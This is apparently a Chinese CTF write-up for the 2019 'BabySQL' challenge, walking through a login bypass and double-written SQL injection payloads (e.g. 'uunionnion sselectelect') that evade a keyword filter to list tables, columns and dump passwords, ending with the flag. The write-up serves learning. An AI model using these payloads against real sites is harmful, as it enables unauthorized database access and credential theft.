[极客大挑战 2019]BabySQL 1新手解题过程

1、使用万能密码登录

显示错误,而且or好像是被过滤了

将or换为||,登录成功

2、查询字段个数,由于存在or过滤,所以无法使用order by 来判断,因此采用拼接字符绕过,进行联合查询

复制代码
?username=admin&password=admin' uunionnion sselectelect 1,2,3%23

3、查表

复制代码
?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(table_name)ffromrom infoorrmation_schema.tables wwherehere table_schema=database()%23

4、查询表字段

复制代码
?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(column_name)ffromrom infoorrmation_schema.columns wwherehere table_name='b4bsql'%23

5、爆破数据

复制代码
?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(passwoorrd)ffromrom b4bsql%23
复制代码
flag{efd91e9e-a5e3-47ee-acc1-ccd6aef806b9}
相关推荐
Andya_net2 小时前
网络安全 | WAF能力全景解析
安全·web安全
大黄说说2 小时前
Go并发双雄:WaitGroup与Channel的抉择与协作
java·服务器·数据库
喜欢打篮球的普通人2 小时前
MLIR入门
数据库·mlir
jjjava2.02 小时前
数据库事务:ACID特性与实战应用
java·开发语言·数据库
东北甜妹2 小时前
Redis Cluster 集群
数据库
(Charon)2 小时前
【kv存储】基于 C 的 KV 存储项目:主从单向同步是怎么实现的
数据库
Jul1en_2 小时前
【Redis】String 类型命令、编码方式与应用场景
数据库·redis·缓存
lifallen3 小时前
一篇文章讲透 Flink State
大数据·数据库·python·flink
mooyuan天天3 小时前
AI大模型辅助Web渗透测试-TRAE智能体自动化解CTF题(命令执行 powershell)
人工智能·web安全·渗透测试·ctf·ai辅助渗透测试